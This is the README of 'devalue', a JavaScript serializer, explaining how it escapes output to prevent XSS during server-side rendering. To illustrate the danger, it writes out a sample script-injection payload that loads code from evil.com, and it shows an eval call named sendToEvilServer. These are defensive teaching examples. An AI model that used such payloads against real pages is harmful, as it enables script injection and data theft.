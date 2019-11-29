Like
JSON.stringify, but handles
obj.self = obj)
[value, value])
undefined,
Infinity,
NaN,
-0
Map and
Set
Try it out on runkit.com.
import devalue from 'devalue';
let obj = { a: 1, b: 2 };
obj.c = 3;
devalue(obj); // '{a:1,b:2,c:3}'
obj.self = obj;
devalue(obj); // '(function(a){a.a=1;a.b=2;a.c=3;a.self=a;return a}({}))'
If
devalue encounters a function or a non-POJO, it will throw an error.
Say you're server-rendering a page and want to serialize some state, which could include user input.
JSON.stringify doesn't protect against XSS attacks:
const state = {
userinput: `</script><script src='https://evil.com/mwahaha.js'>`
};
const template = `
<script>
// NEVER DO THIS
var preloaded = ${JSON.stringify(state)};
</script>`;
Which would result in this:
<script>
// NEVER DO THIS
var preloaded = {"userinput":"</script><script src='https://evil.com/mwahaha.js'>"};
</script>
Using
devalue, we're protected against that attack:
const template = `
<script>
var preloaded = ${devalue(state)};
</script>`;
<script>
var preloaded = {userinput:"\\u003C\\u002Fscript\\u003E\\u003Cscript src=\'https:\\u002F\\u002Fevil.com\\u002Fmwahaha.js\'\\u003E"};
</script>
This, along with the fact that
devalue bails on functions and non-POJOs, stops attackers from executing arbitrary code. Strings generated by
devalue can be safely deserialized with
eval or
new Function:
const value = (0,eval)('(' + str + ')');
While
devalue prevents the XSS vulnerability shown above, meaning you can use it to send data from server to client, you should not send user data from client to server using the same method. Since it has to be evaluated, an attacker that successfully submitted data that bypassed
devalue would have access to your system.
When using
eval, ensure that you call it indirectly so that the evaluated code doesn't have access to the surrounding scope:
{
const sensitiveData = 'Setec Astronomy';
eval('sendToEvilServer(sensitiveData)'); // pwned :(
(0,eval)('sendToEvilServer(sensitiveData)'); // nice try, evildoer!
}
Using
new Function(code) is akin to using indirect eval.